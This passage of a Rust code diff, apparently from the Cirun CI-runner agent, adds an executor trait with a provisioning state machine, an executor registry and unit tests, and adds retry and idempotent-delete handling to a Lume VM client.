+///   - numeric string `"1"`, `"2"`, ... → `Count(n)`
+pub fn parse_gpu_request(value: Option<&serde_json::Value>) -> Result<GpuRequest, String> {
+    let v = match value {
+        None => return Ok(GpuRequest::None),
+        Some(v) if v.is_null() => return Ok(GpuRequest::None),
+        Some(v) => v,
+    };
+    if let Some(s) = v.as_str() {
+        let s = s.trim().to_ascii_lowercase();
+        if s.is_empty() || s == "none" {
+            return Ok(GpuRequest::None);
+        }
+        if s == "all" {
+            return Ok(GpuRequest::All);
+        }
+        if let Ok(n) = s.parse::<u32>() {
+            if n == 0 {
+                return Ok(GpuRequest::None);
+            }
+            return Ok(GpuRequest::Count(n));
+        }
+        return Err(format!("invalid gpu request: '{s}'"));
+    }
+    if let Some(n) = v.as_u64() {
+        return match u32::try_from(n) {
+            Ok(0) => Ok(GpuRequest::None),
+            Ok(n) => Ok(GpuRequest::Count(n)),
+            Err(_) => Err(format!("gpu count {n} out of range")),
+        };
+    }
+    Err(format!("gpu must be string or integer, got {v}"))
+}
+
+#[derive(Debug, Clone)]
+pub struct RunnerLogin {
+    pub username: String,
+    /// Read by the lume executor only (sshpass auth to the macOS VM). The
+    /// field is still populated on linux builds so the struct shape stays
+    /// uniform across the codebase; the `allow(dead_code)` only kicks in
+    /// where no executor consumes it.
+    #[cfg_attr(not(target_os = "macos"), allow(dead_code))]
+    pub password: String,
+}
+
+#[derive(Debug, Clone)]
+pub struct RunnerSpec {
+    pub name: String,
+    pub provision_script: String,
+    pub image: String,
+    pub cpu: u32,
+    pub memory_gb: u32,
+    /// Read by `meda` only (cloud-hypervisor disk size); other executors
+    /// take disk size from their image. `allow(dead_code)` keeps the field
+    /// available on macos builds where the meda module is cfg'd out.
+    #[cfg_attr(not(target_os = "linux"), allow(dead_code))]
+    pub disk_gb: u32,
+    pub gpu: GpuRequest,
+    pub login: RunnerLogin,
+}
+
+#[derive(Debug, Clone, PartialEq, Eq)]
+pub enum RunnerState {
+    /// Workload is alive and serving.
+    Healthy,
+    /// Created but not yet healthy. Settle-poll keeps waiting.
+    Starting,
+    /// Workload exited or crashed. Last-logs aids diagnosis.
+    Terminated {
+        exit_code: Option<i32>,
+        last_logs: String,
+    },
+    /// No such runner.
+    Absent,
+}
+
+#[derive(Debug, Clone, PartialEq, Eq)]
+pub struct OwnedRunner {
+    pub name: String,
+    pub state: RunnerState,
+}
+
+#[derive(Debug, thiserror::Error)]
+pub enum ProvisionError {
+    /// Caller may retry.
+    #[error("transient: {0}")]
+    Transient(String),
+    /// Permanent runtime failure — do not retry. Constructed by the lume
+    /// executor (macos-only); kept on linux for parity with the trait
+    /// surface so callers can match exhaustively without cfg branches.
+    #[cfg_attr(not(target_os = "macos"), allow(dead_code))]
+    #[error("permanent: {0}")]
+    Permanent(String),
+    /// Spec is incompatible with this executor (e.g. lume + GPU). Never retry.
+    #[error("incompatible: {0}")]
+    Incompatible(String),
+}
+
+#[async_trait]
+pub trait Executor: Send + Sync {
+    // ── primitives ───────────────────────────────────────────────
+    async fn inspect(&self, name: &str) -> Result<RunnerState, ProvisionError>;
+    async fn spawn(&self, spec: &RunnerSpec) -> Result<(), ProvisionError>;
+    async fn kill(&self, name: &str) -> Result<(), ProvisionError>;
+    async fn list_owned(&self) -> Result<Vec<OwnedRunner>, ProvisionError>;
+
+    // ── hooks (override if needed) ───────────────────────────────
+    fn settle_timeout(&self) -> Duration {
+        Duration::from_secs(120)
+    }
+    fn settle_poll_interval(&self) -> Duration {
+        Duration::from_secs(3)
+    }
+    fn validate(&self, _spec: &RunnerSpec) -> Result<(), ProvisionError> {
+        Ok(())
+    }
+    async fn prepare(&self, _spec: &RunnerSpec) -> Result<(), ProvisionError> {
+        Ok(())
+    }
+    async fn run_post_spawn(&self, _spec: &RunnerSpec) -> Result<(), ProvisionError> {
+        Ok(())
+    }
+
+    // ── default-impl orchestration ───────────────────────────────
+
+    /// The whole provisioning state machine. Caller invokes this; everything
+    /// else (idempotency, settle-poll, cleanup-on-fail) lives in here.
+    async fn provision(&self, spec: &RunnerSpec) -> Result<(), ProvisionError> {
+        self.validate(spec)?;
+        match self.inspect(&spec.name).await? {
+            RunnerState::Healthy | RunnerState::Starting => return Ok(()),
+            RunnerState::Terminated { .. } => {
+                self.kill(&spec.name).await?;
+            }
+            RunnerState::Absent => {}
+        }
+        self.prepare(spec).await?;
+        self.spawn(spec).await?;
+
+        // Settle-poll: keep checking until Healthy, timeout, or definitive failure.
+        let deadline = tokio::time::Instant::now() + self.settle_timeout();
+        loop {
+            tokio::time::sleep(self.settle_poll_interval()).await;
+            match self.inspect(&spec.name).await? {
+                RunnerState::Healthy => {
+                    // Settle done; run any post-spawn step (e.g. SSH-push provisioning
+                    // for meda/lume). Docker's CMD already ran the script, so its
+                    // default no-op is correct.
+                    if let Err(e) = self.run_post_spawn(spec).await {
+                        let _ = self.kill(&spec.name).await;
+                        return Err(e);
+                    }
+                    return Ok(());
+                }
+                RunnerState::Starting => {
+                    if tokio::time::Instant::now() >= deadline {
+                        let _ = self.kill(&spec.name).await;
+                        return Err(ProvisionError::Transient(format!(
+                            "runner '{}' did not reach Healthy within {:?}",
+                            spec.name,
+                            self.settle_timeout()
+                        )));
+                    }
+                }
+                RunnerState::Terminated {
+                    exit_code,
+                    last_logs,
+                } => {
+                    let _ = self.kill(&spec.name).await;
+                    return Err(ProvisionError::Transient(format!(
+                        "runner '{}' exited (code={:?}) during settle: {}",
+                        spec.name, exit_code, last_logs
+                    )));
+                }
+                RunnerState::Absent => {
+                    return Err(ProvisionError::Transient(format!(
+                        "runner '{}' disappeared during settle",
+                        spec.name
+                    )));
+                }
+            }
+        }
+    }
+
+    /// Count of runners currently in `Healthy` state.
+    async fn count_running(&self) -> Result<usize, ProvisionError> {
+        let runners = self.list_owned().await?;
+        Ok(runners
+            .into_iter()
+            .filter(|r| r.state == RunnerState::Healthy)
+            .count())
+    }
+}
+
+#[cfg(test)]
+mod tests;

--- a/src/executor/registry.rs
+++ b/src/executor/registry.rs
@@ -1,0 +1,100 @@
+//! Executor registry. Holds available executors per host, exposes lookup and
+//! aggregation operations (cross-executor list / count) used by the main loop.
+
+use super::{Executor, ExecutorKind, OwnedRunner, ProvisionError};
+use std::collections::HashMap;
+use std::sync::Arc;
+
+pub struct Registry {
+    executors: HashMap<ExecutorKind, Arc<dyn Executor>>,
+}
+
+impl Registry {
+    /// Probe what executors can plausibly run on this host. Construction
+    /// failures (daemon down, binary missing) silently drop that executor —
+    /// it just won't appear in the registry. Caller resolves missing
+    /// executors as `BackendUnavailable`.
+    pub fn probe() -> Self {
+        let mut executors: HashMap<ExecutorKind, Arc<dyn Executor>> = HashMap::new();
+        // Docker works on any OS (Linux native, macOS via Docker Desktop) —
+        // register if the daemon answers a ping.
+        let docker = super::docker::DockerExecutor::new();
+        match docker.client_ping() {
+            Ok(v) => {
+                log::info!("docker daemon reachable: {v}");
+                executors.insert(ExecutorKind::Docker, Arc::new(docker));
+            }
+            Err(e) => log::info!("docker daemon not available (skipping): {e}"),
+        }
+        #[cfg(target_os = "linux")]
+        {
+            if let Ok(m) = super::meda::MedaExecutor::new() {
+                executors.insert(ExecutorKind::Meda, Arc::new(m));
+            }
+        }
+        #[cfg(target_os = "macos")]
+        {
+            if let Ok(l) = super::lume::LumeExecutor::new() {
+                executors.insert(ExecutorKind::Lume, Arc::new(l));
+            }
+        }
+        Self { executors }
+    }
+
+    /// Build a Registry from an explicit map. Intended for tests that need to
+    /// inject a fake executor without probing the host. Not part of the
+    /// production wiring — `probe()` is the canonical constructor.
+    #[cfg(test)]
+    pub fn from_executors(executors: HashMap<ExecutorKind, Arc<dyn Executor>>) -> Self {
+        Self { executors }
+    }
+
+    pub fn get(&self, kind: ExecutorKind) -> Result<Arc<dyn Executor>, ProvisionError> {
+        self.executors.get(&kind).cloned().ok_or_else(|| {
+            ProvisionError::Incompatible(format!("executor {kind:?} not available on this host"))
+        })
+    }
+
+    /// Names of registered executors as lowercase strings (`"docker"`, `"meda"`,
+    /// `"lume"`), sorted for deterministic wire output. Sent on the agent's GET
+    /// /agent body so the cirun api can route by capability instead of host OS.
+    pub fn kind_names(&self) -> Vec<&'static str> {
+        let mut out: Vec<&'static str> = self
+            .executors
+            .keys()
+            .map(|k| match k {
+                ExecutorKind::Docker => "docker",
+                ExecutorKind::Meda => "meda",
+                ExecutorKind::Lume => "lume",
+            })
+            .collect();
+        out.sort_unstable();
+        out
+    }
+
+    /// Aggregate count of running runners across every registered executor.
+    /// Errors per-executor are logged and that executor counts as 0.
+    pub async fn total_count_running(&self) -> usize {
+        let mut total = 0;
+        for (kind, exec) in &self.executors {
+            match exec.count_running().await {
+                Ok(n) => total += n,
+                Err(e) => log::warn!("count_running({kind:?}) failed: {e}"),
+            }
+        }
+        total
+    }
+
+    /// Cross-executor list. Returns `(kind, runner)` pairs so the caller can
+    /// preserve the binding for reporting / orphan-cleanup decisions.
+    pub async fn list_all(&self) -> Vec<(ExecutorKind, OwnedRunner)> {
+        let mut all = Vec::new();
+        for (kind, exec) in &self.executors {
+            match exec.list_owned().await {
+                Ok(runners) => all.extend(runners.into_iter().map(|r| (*kind, r))),
+                Err(e) => log::warn!("list_owned({kind:?}) failed: {e}"),
+            }
+        }
+        all
+    }
+}

--- a/src/executor/tests.rs
+++ b/src/executor/tests.rs
@@ -1,0 +1,380 @@
+//! Unit tests for the executor trait + state machine. Lives in a sibling
+//! file so `mod.rs` stays under the project's 500-line soft cap.
+
+use super::*;
+use serde_json::json;
+use std::sync::Mutex;
+
+/// A scriptable executor for testing the default `provision` state machine.
+/// `inspect_script` is a queue: each call to `inspect()` pops the front.
+struct FakeExecutor {
+    inspect_script: Mutex<Vec<RunnerState>>,
+    spawn_calls: Mutex<u32>,
+    kill_calls: Mutex<u32>,
+    post_spawn_calls: Mutex<u32>,
+    settle_timeout: Duration,
+    settle_interval: Duration,
+}
+
+impl FakeExecutor {
+    fn with_script(script: Vec<RunnerState>) -> Self {
+        Self {
+            inspect_script: Mutex::new(script),
+            spawn_calls: Mutex::new(0),
+            kill_calls: Mutex::new(0),
+            post_spawn_calls: Mutex::new(0),
+            settle_timeout: Duration::from_millis(500),
+            settle_interval: Duration::from_millis(1),
+        }
+    }
+}
+
+#[async_trait]
+impl Executor for FakeExecutor {
+    fn settle_timeout(&self) -> Duration {
+        self.settle_timeout
+    }
+    fn settle_poll_interval(&self) -> Duration {
+        self.settle_interval
+    }
+    async fn inspect(&self, _name: &str) -> Result<RunnerState, ProvisionError> {
+        let mut q = self.inspect_script.lock().unwrap();
+        Ok(if q.is_empty() {
+            RunnerState::Healthy
+        } else {
+            q.remove(0)
+        })
+    }
+    async fn spawn(&self, _spec: &RunnerSpec) -> Result<(), ProvisionError> {
+        *self.spawn_calls.lock().unwrap() += 1;
+        Ok(())
+    }
+    async fn kill(&self, _name: &str) -> Result<(), ProvisionError> {
+        *self.kill_calls.lock().unwrap() += 1;
+        Ok(())
+    }
+    async fn list_owned(&self) -> Result<Vec<OwnedRunner>, ProvisionError> {
+        Ok(vec![])
+    }
+    async fn run_post_spawn(&self, _spec: &RunnerSpec) -> Result<(), ProvisionError> {
+        *self.post_spawn_calls.lock().unwrap() += 1;
+        Ok(())
+    }
+}
+
+fn spec(name: &str) -> RunnerSpec {
+    RunnerSpec {
+        name: name.into(),
+        provision_script: String::new(),
+        image: "ubuntu:24.04".into(),
+        cpu: 2,
+        memory_gb: 4,
+        disk_gb: 20,
+        gpu: GpuRequest::None,
+        login: RunnerLogin {
+            username: "runner".into(),
+            password: "p".into(),
+        },
+    }
+}
+
+#[test]
+fn derive_kind_explicit_executor_wins() {
+    let cfg = json!({ "executor": "docker" });
+    assert_eq!(
+        resolve_executor_kind(None, Some(&cfg), "linux").unwrap(),
+        ExecutorKind::Docker
+    );
+    let cfg = json!({ "executor": "lume" });
+    assert_eq!(
+        resolve_executor_kind(None, Some(&cfg), "linux").unwrap(),
+        ExecutorKind::Lume
+    );
+}
+
+#[test]
+fn derive_kind_legacy_container_true_maps_to_docker() {
+    let cfg = json!({ "container": true });
+    assert_eq!(
+        resolve_executor_kind(None, Some(&cfg), "linux").unwrap(),
+        ExecutorKind::Docker
+    );
+}
+
+#[test]
+fn derive_kind_os_defaults() {
+    assert_eq!(
+        resolve_executor_kind(None, None, "linux").unwrap(),
+        ExecutorKind::Meda
+    );
+    assert_eq!(
+        resolve_executor_kind(None, None, "macos").unwrap(),
+        ExecutorKind::Lume
+    );
+}
+
+#[test]
+fn derive_kind_explicit_overrides_container_legacy() {
+    let cfg = json!({ "executor": "meda", "container": true });
+    assert_eq!(
+        resolve_executor_kind(None, Some(&cfg), "linux").unwrap(),
+        ExecutorKind::Meda
+    );
+}
+
+#[test]
+fn derive_kind_unknown_executor_errors() {
+    let cfg = json!({ "executor": "kata" });
+    assert!(resolve_executor_kind(None, Some(&cfg), "linux").is_err());
+}
+
+#[test]
+fn resolve_top_level_wins_over_extra_config() {
+    let cfg = json!({ "executor": "meda", "container": true });
+    assert_eq!(
+        resolve_executor_kind(Some("docker"), Some(&cfg), "linux").unwrap(),
+        ExecutorKind::Docker
+    );
+}
+
+#[test]
+fn resolve_falls_through_to_extra_config_when_top_empty() {
+    let cfg = json!({ "executor": "docker" });
+    assert_eq!(
+        resolve_executor_kind(None, Some(&cfg), "linux").unwrap(),
+        ExecutorKind::Docker
+    );
+    // empty string is treated as "missing" — fall through, not error
+    assert_eq!(
+        resolve_executor_kind(Some(""), Some(&cfg), "linux").unwrap(),
+        ExecutorKind::Docker
+    );
+}
+
+#[test]
+fn resolve_falls_through_to_os_default() {
+    assert_eq!(
+        resolve_executor_kind(None, None, "macos").unwrap(),
+        ExecutorKind::Lume
+    );
+}
+
+#[test]
+fn resolve_unknown_top_executor_errors() {
+    assert!(resolve_executor_kind(Some("kata"), None, "linux").is_err());
+}
+
+#[test]
+fn resolve_top_executor_is_case_and_whitespace_insensitive() {
+    assert_eq!(
+        resolve_executor_kind(Some("DOCKER"), None, "linux").unwrap(),
+        ExecutorKind::Docker
+    );
+    assert_eq!(
+        resolve_executor_kind(Some(" docker "), None, "linux").unwrap(),
+        ExecutorKind::Docker
+    );
+    assert_eq!(
+        resolve_executor_kind(Some("Lume"), None, "macos").unwrap(),
+        ExecutorKind::Lume
+    );
+}
+
+#[test]
+fn resolve_extra_config_executor_is_case_insensitive() {
+    let cfg = json!({ "executor": "MEDA" });
+    assert_eq!(
+        resolve_executor_kind(None, Some(&cfg), "linux").unwrap(),
+        ExecutorKind::Meda
+    );
+}
+
+#[test]
+fn parse_gpu_missing_means_none() {
+    assert_eq!(parse_gpu_request(None).unwrap(), GpuRequest::None);
+}
+
+#[test]
+fn parse_gpu_all() {
+    let v = json!("all");
+    assert_eq!(parse_gpu_request(Some(&v)).unwrap(), GpuRequest::All);
+    let v = json!("ALL");
+    assert_eq!(parse_gpu_request(Some(&v)).unwrap(), GpuRequest::All);
+}
+
+#[test]
+fn parse_gpu_none_string() {
+    let v = json!("none");
+    assert_eq!(parse_gpu_request(Some(&v)).unwrap(), GpuRequest::None);
+}
+
+#[test]
+fn parse_gpu_count_integer() {
+    let v = json!(2);
+    assert_eq!(parse_gpu_request(Some(&v)).unwrap(), GpuRequest::Count(2));
+}
+
+#[test]
+fn parse_gpu_count_string() {
+    let v = json!("3");
+    assert_eq!(parse_gpu_request(Some(&v)).unwrap(), GpuRequest::Count(3));
+}
+
+#[test]
+fn parse_gpu_zero_is_none() {
+    let v = json!(0);
+    assert_eq!(parse_gpu_request(Some(&v)).unwrap(), GpuRequest::None);
+}
+
+#[test]
+fn parse_gpu_invalid_string_errors() {
+    let v = json!("seventeen");
+    assert!(parse_gpu_request(Some(&v)).is_err());
+}
+
+#[tokio::test]
+async fn provision_calls_run_post_spawn_after_settle_healthy() {
+    let exec = FakeExecutor::with_script(vec![RunnerState::Absent, RunnerState::Healthy]);
+    exec.provision(&spec("r1")).await.unwrap();
+    assert_eq!(
+        *exec.post_spawn_calls.lock().unwrap(),
+        1,
+        "must call run_post_spawn after VM is healthy"
+    );
+}
+
+#[tokio::test]
+async fn provision_does_not_call_run_post_spawn_on_idempotent_skip() {
+    let exec = FakeExecutor::with_script(vec![RunnerState::Healthy]);
+    exec.provision(&spec("r1")).await.unwrap();
+    assert_eq!(
+        *exec.post_spawn_calls.lock().unwrap(),
+        0,
+        "skip path must not re-run post_spawn"
+    );
+}
+
+#[tokio::test]
+async fn provision_is_noop_when_runner_already_healthy() {
+    let exec = FakeExecutor::with_script(vec![RunnerState::Healthy]);
+    exec.provision(&spec("r1")).await.unwrap();
+    assert_eq!(
+        *exec.spawn_calls.lock().unwrap(),
+        0,
+        "must not spawn when healthy"
+    );
+    assert_eq!(
+        *exec.kill_calls.lock().unwrap(),
+        0,
+        "must not kill when healthy"
+    );
+}
+
+#[tokio::test]
+async fn provision_spawns_when_absent() {
+    let exec = FakeExecutor::with_script(vec![RunnerState::Absent, RunnerState::Healthy]);
+    exec.provision(&spec("r1")).await.unwrap();
+    assert_eq!(
+        *exec.spawn_calls.lock().unwrap(),
+        1,
+        "must spawn once when absent"
+    );
+    assert_eq!(
+        *exec.kill_calls.lock().unwrap(),
+        0,
+        "must not kill when absent"
+    );
+}
+
+#[tokio::test]
+async fn provision_polls_until_healthy_after_spawn() {
+    // Absent (initial) → spawn called → Starting (poll 1) → Starting (poll 2) → Healthy (poll 3) → Ok
+    let exec = FakeExecutor::with_script(vec![
+        RunnerState::Absent,
+        RunnerState::Starting,
+        RunnerState::Starting,
+        RunnerState::Healthy,
+    ]);
+    exec.provision(&spec("r1")).await.unwrap();
+    assert_eq!(*exec.spawn_calls.lock().unwrap(), 1);
+    // script must be fully consumed — 4 inspect calls
+    assert!(
+        exec.inspect_script.lock().unwrap().is_empty(),
+        "all inspects must be consumed"
+    );
+}
+
+#[tokio::test]
+async fn provision_returns_transient_on_settle_timeout() {
+    // Absent → spawn → endless Starting (script empty by call 3 — falls through to Healthy default).
+    // Use short timeout so we exhaust the deadline before script ends naturally.
+    let mut exec = FakeExecutor::with_script(vec![
+        RunnerState::Absent,
+        RunnerState::Starting,
+        RunnerState::Starting,
+        RunnerState::Starting,
+        RunnerState::Starting,
+        RunnerState::Starting,
+        RunnerState::Starting,
+        RunnerState::Starting,
+        RunnerState::Starting,
+        RunnerState::Starting,
+        RunnerState::Starting,
+    ]);
+    exec.settle_timeout = Duration::from_millis(10);
+    exec.settle_interval = Duration::from_millis(3);
+    let err = exec.provision(&spec("r1")).await.unwrap_err();
+    assert!(
+        matches!(err, ProvisionError::Transient(_)),
+        "expected Transient, got {:?}",
+        err
+    );
+    assert!(
+        *exec.kill_calls.lock().unwrap() >= 1,
+        "must reap on timeout"
+    );
+}
+
+#[tokio::test]
+async fn provision_returns_transient_when_terminated_during_settle() {
+    let exec = FakeExecutor::with_script(vec![
+        RunnerState::Absent,
+        RunnerState::Starting,
+        RunnerState::Terminated {
+            exit_code: Some(137),
+            last_logs: "OOM".into(),
+        },
+    ]);
+    let err = exec.provision(&spec("r1")).await.unwrap_err();
+    assert!(
+        matches!(err, ProvisionError::Transient(_)),
+        "expected Transient, got {:?}",
+        err
+    );
+    assert!(
+        *exec.kill_calls.lock().unwrap() >= 1,
+        "must reap exited runner"
+    );
+}
+
+#[tokio::test]
+async fn provision_reaps_then_spawns_when_terminated() {
+    let exec = FakeExecutor::with_script(vec![
+        RunnerState::Terminated {
+            exit_code: Some(1),
+            last_logs: "boom".into(),
+        },
+        RunnerState::Healthy,
+    ]);
+    exec.provision(&spec("r1")).await.unwrap();
+    assert_eq!(
+        *exec.kill_calls.lock().unwrap(),
+        1,
+        "must reap stale corpse"
+    );
+    assert_eq!(
+        *exec.spawn_calls.lock().unwrap(),
+        1,
+        "must spawn fresh runner"
+    );
+}

--- a/src/lume/client.rs
+++ b/src/lume/client.rs
@@ -10,6 +10,19 @@ const DEFAULT_API_URL: &str = "http://127.0.0.1:7777/lume";
 const CONNECT_TIMEOUT: u64 = 10; // 10 seconds
 const MAX_TIMEOUT: u64 = 300; // 5 minutes
 
+/// True when a non-2xx delete response means "the VM is already gone" rather
+/// than "the delete actually failed". Lume returns HTTP 400 with the body
+/// `{"message":"Virtual machine not found: <name>"}` in that case (observed
+/// in prod 2026-05-15). Treating it as success lets the agent honour a
+/// duplicate delete request from the cirun api without burning the retry
+/// budget — same shape as `docker rm`'s "No such container" path.
+pub(crate) fn lume_delete_means_absent(status: reqwest::StatusCode, body: &str) -> bool {
+    if status == reqwest::StatusCode::NOT_FOUND {
+        return true;
+    }
+    body.contains("Virtual machine not found") || body.contains("VM not found")
+}
+
 pub struct LumeClient {
     client: Client,
     base_url: String,
@@ -64,34 +77,52 @@ impl LumeClient {
 
     pub async fn run_vm(&self, name: &str, config: Option<RunConfig>) -> Result<(), LumeError> {
         let url = format!("{}/vms/{}/run", self.base_url, name);
-
-        let mut request = self.client.post(&url);
-
-        if let Some(run_config) = config {
-            request = request.json(&run_config);
-        }
-
         info!("Sending request to start VM: {}", name);
 
-        let response = request.send().await?;
-        let status = response.status(); // Clone status before calling .text()
-        let response_text = response
-            .text()
+        // Lume's daemon transiently drops the connection right after a clone
+        // (observed on m1 2026-05-15: "Connection reset by peer" within 1s of
+        // clone returning 200). Wrap in the same retry shape as delete_vm so
+        // a single hiccup doesn't fail provisioning. Without this the new
+        // executor::lume::spawn → run_vm path is too brittle to land cleanly
+        // in production.
+        let send_run_request = || {
+            let url = url.clone();
+            let cfg = config.clone();
+            async move {
+                let mut request = self.client.post(&url);
+                if let Some(run_config) = cfg {
+                    request = request.json(&run_config);
+                }
+                let response = request
+                    .send()
+                    .await
+                    .map_err(|e| LumeError::ApiError(format!("HTTP request failed: {:?}", e)))?;
+                let status = response.status();
+                let response_text = response
+                    .text()
+                    .await
+                    .unwrap_or_else(|_| "Failed to read response body".to_string());
+                info!(
+                    "VM Run API Response: Status = {}, Body = {}",
+                    status, response_text
+                );
+                if !status.is_success() {
+                    return Err(LumeError::ApiError(format!(
+                        "Failed to run VM: {}",
+                        response_text
+                    )));
+                }
+                Ok(())
+            }
+        };
+
+        send_run_request
+            .retry(ExponentialBuilder::default().with_max_times(5))
+            .sleep(tokio::time::sleep)
+            .when(|e| matches!(e, LumeError::ApiError(_)))
+            .notify(|err, dur| warn!("Retrying VM start after {:?}: {:?}", dur, err))
             .await
-            .unwrap_or_else(|_| "Failed to read response body".to_string());
-
-        info!(
-            "VM Run API Response: Status = {}, Body = {}",
-            status, response_text
-        );
-
-        if !status.is_success() {
-            // Use the cloned status here
-            return Err(LumeError::ApiError(format!(
-                "Failed to run VM: {}",
-                response_text
-            )));
-        }
+            .map_err(|e| LumeError::ApiError(format!("Retry exhausted: {:?}", e)))?;
 
         info!("Successfully started VM: {}", name);
         Ok(())
@@ -168,6 +199,14 @@ impl LumeClient {
                 info!("Delete operation response body: {}", response_text);
 
                 if !status.is_success() {
+                    // Idempotent: "already gone" is success, not a retryable
+                    // failure. Without this short-circuit, a duplicate delete
+                    // from the cirun api burns the 5-attempt retry budget on
+                    // every cycle (observed in prod 2026-05-15).
+                    if lume_delete_means_absent(status, &response_text) {
+                        info!("VM {} already absent — treating delete as success", name);
+                        return Ok(());
+                    }
                     return Err(LumeError::ApiError(format!(
                         "Failed to delete VM: {}",
                         response_text
@@ -312,5 +351,42 @@ impl LumeClient {
 
         info!("Image pull request sent successfully for '{}'", image);
         Ok(())
+    }
+}
+
+#[cfg(test)]
+mod tests {
+    use super::*;
+    use reqwest::StatusCode;
+
+    #[test]
+    fn classifier_treats_400_not_found_body_as_absent() {
+        let body = r#"{"message":"Virtual machine not found: cirun-r1"}"#;
+        assert!(lume_delete_means_absent(StatusCode::BAD_REQUEST, body));
+    }
+
+    #[test]
+    fn classifier_treats_http_404_as_absent_regardless_of_body() {
+        assert!(lume_delete_means_absent(StatusCode::NOT_FOUND, ""));
+    }
+
+    #[test]
+    fn classifier_rejects_500_and_other_failures() {
+        assert!(!lume_delete_means_absent(
+            StatusCode::INTERNAL_SERVER_ERROR,
+            "boom"
+        ));
+        assert!(!lume_delete_means_absent(
+            StatusCode::CONFLICT,
+            "vm is locked"
+        ));
+    }
+
+    #[test]
+    fn classifier_does_not_match_unrelated_400() {
+        assert!(!lume_delete_means_absent(
+            StatusCode::BAD_REQUEST,
+            "invalid name format"
+        ));
     }
 }

--- a/src/lume/models.rs
+++ b/src/lume/models.rs
@@ -13,13 +13,13 @@ pub struct VmConfig {
     pub ipsw: Option<String>,
 }
 
-#[derive(Debug, Serialize, Deserialize)]
+#[derive(Debug, Clone, Serialize, Deserialize)]
 pub struct SharedDirectory {
     pub host_path: String,
     pub read_only: bool,
 }
 
-#[derive(Debug, Serialize, Deserialize)]
+#[derive(Debug, Clone, Serialize, Deserialize)]
 pub struct RunConfig {
     #[serde(skip_serializing_if = "Option::is_none")]
     #[serde(rename = "noDisplay")]

--- a/src/lume/pull.rs
+++ b/src/lume/pull.rs
@@ -1,5 +1,5 @@
+use crate::api::TemplateConfig;
 use crate::lume::client::LumeClient;
-use crate::TemplateConfig;
 use log::{error, info, warn};
 use reqwest::Client;
 use serde_json::json;
@@ -63,7 +63,7 @@ pub async fn pull_image(
                 match lume.get_vm(vm_name).await {
                     Ok(vm) => {
                         info!(
-                            "✅ VM '{}' is now available after image pull. State: {}",
+                            "[OK] VM '{}' is now available after image pull. State: {}",
                             vm_name, vm.state
                         );
                         return Ok(());
@@ -379,7 +379,7 @@ pub async fn create_template(
             }
 
             info!(
-                "✅ Template '{}' successfully created and ready for use",
+                "[OK] Template '{}' successfully created and ready for use",
                 template_name
             );
             Ok(())

--- a/src/main.rs
+++ b/src/main.rs
@@ -1,31 +1,38 @@
+mod api;
+mod bootstrap;
+mod cirun_client;
+mod config;
+mod docker;
+mod executor;
+#[cfg(target_os = "macos")]
 mod lume;
+#[cfg(target_os = "linux")]
 mod meda;
+mod provision;
+mod service;
+mod ssh;
+#[cfg(target_os = "macos")]
 mod vm_provision;
 
-use crate::lume::client::LumeClient;
+// TemplateConfig is only consumed by the macos lume template-name test below.
+#[cfg(all(test, target_os = "macos"))]
+use api::TemplateConfig;
+
+use crate::cirun_client::CirunClient;
+#[cfg(target_os = "macos")]
 use crate::lume::setup::cleanup_log_files as cleanup_lume_logs;
-use crate::lume::{
-    check_template_exists, create_template, find_matching_template, generate_template_name,
-};
-use crate::meda::client::MedaClient;
+#[cfg(target_os = "linux")]
 use crate::meda::setup::cleanup_log_files as cleanup_meda_logs;
+use crate::provision::ProvisionResult;
+#[cfg(target_os = "macos")]
 use crate::vm_provision::run_script_on_vm;
 use clap::Parser;
 use log::{debug, error, info, warn};
-use reqwest::{Client, Error};
-use serde::{Deserialize, Serialize};
-use serde_json::json;
-use std::collections::HashMap;
 use std::env;
-use std::fs;
 use std::path::{Path, PathBuf};
-use std::process::Command as StdCommand;
-use std::sync::Arc;
 use std::time::SystemTime;
-use tokio::sync::Semaphore;
 use tokio::task::JoinSet;
 use tokio::time::{sleep, Duration};
-use uuid::Uuid;
 
 const CIRUN_BANNER: &str = r#"
        _                       _                    _
@@ -41,7 +48,11 @@ const CIRUN_BANNER: &str = r#"
 #[command(version, about = "Cirun Agent", long_about = None)]
 struct Args {
     /// API token for authentication
-    #[arg(short, long, required_unless_present = "uninstall_service")]
+    #[arg(
+        short,
+        long,
+        required_unless_present_any = ["uninstall_service", "docker_smoke_test"],
+    )]
     api_token: Option<String>,
 
     /// Polling interval in seconds
@@ -67,1471 +78,60 @@ struct Args {
     /// Maximum number of concurrent VMs (required on macOS due to Apple Virtualization Framework limit of 2)
     #[arg(long, value_parser = clap::value_parser!(u32).range(1..))]
     max_vms: Option<u32>,
+
+    /// Run a docker GPU smoke test (`docker run --rm --gpus all <image> nvidia-smi`) and exit.
+    /// Use to verify nvidia-container-toolkit + GPU passthrough on the host.
+    #[arg(long)]
+    docker_smoke_test: bool,
+
+    /// Image to use for `--docker-smoke-test` (default: `nvidia/cuda:12.4.0-base-ubuntu22.04`).
+    #[arg(long, default_value = "nvidia/cuda:12.4.0-base-ubuntu22.04")]
+    docker_smoke_image: String,
 }
 
 const MACOS_DEFAULT_MAX_VMS: u32 = 2;
 
-// Structs for agent and API data
-#[derive(Debug, Serialize, Deserialize, Clone)]
-struct AgentInfo {
-    id: String,
-    hostname: String,
-    os: String,
-    arch: String,
-}
-
-#[derive(Debug, Serialize, Deserialize)]
-struct ApiResponse {
-    #[serde(default)]
-    runners_to_provision: Vec<RunnerToProvision>,
-    runners_to_delete: Vec<RunnerToDelete>,
-}
-
-#[derive(Debug, Serialize, Deserialize, Clone)]
-struct TemplateConfig {
-    image: String,
-    registry: Option<String>,
-    organization: Option<String>,
-    cpu: u32,
-    memory: u32,
-    disk: u32,
-    os: String,
-}
-
-#[derive(Debug, Serialize, Deserialize, Clone)]
-struct RunnerLogin {
-    username: String,
-    password: String,
-}
-
-#[derive(Debug, Clone)]
-struct RunnerResources {
-    cpu: u32,
-    memory: u32,
-    disk: u32,
-}
-
-fn default_max_retries() -> u32 {
-    3
-}
-
-#[derive(Debug, Serialize, Deserialize, Clone)]
-struct RunnerToProvision {
-    name: String,
-    provision_script: String,
-    image: String, // The container/VM image to use
-    os: String,    // The OS platform: "linux", "macos", or "windows"
-    cpu: u32,
-    memory: u32,
-    #[serde(default)]
-    disk: u32,
-    login: RunnerLogin,
-    #[serde(default = "default_max_retries")]
-    max_retries: u32,
-}
-
-#[derive(Debug, Serialize, Deserialize)]
-struct RunnerToDelete {
-    name: String,
-}
-
-#[allow(dead_code)]
-#[derive(Debug, Serialize, Deserialize)]
-struct CommandResponse {
-    command: String,
-    output: String,
-    error: String,
-    agent: AgentInfo,
-}
-
